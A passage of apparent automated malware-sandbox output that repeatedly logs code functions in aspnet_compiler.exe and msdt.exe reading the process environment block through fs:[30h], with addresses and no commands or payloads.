          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0140D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014BFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014BFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014BFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014BFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014A8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01422581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01422581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01422581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01422581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014235A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01421DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01421DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01421DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0148C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0148C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01476C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01476C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01476C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01476C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01476CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01476CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01476CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0140849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0140EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013F4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013F4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0140FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0148FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0148FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014337F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01477794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01477794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01477794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01408794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01407E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01407E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01407E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01407E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01407E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01407E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014BAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014BAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013FE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0140766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013FC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013FC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013FC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01428E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014AFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01438EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014AFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014236CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014216E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014076E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0148FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014746A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054F3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05523D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05497D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05548D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0553E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0547AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054FA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05483D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05483D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05483D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05483D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05483D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05483D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05483D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05483D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05483D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05483D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05483D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05483D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05483D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054F6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05528DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0548D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0548D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0553FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0553FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0553FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0553FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05472D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05472D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05472D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05472D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05472D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05532D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05532D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05532D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05532D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05532D82 mov eax, dword ptr fs:[00000030h]
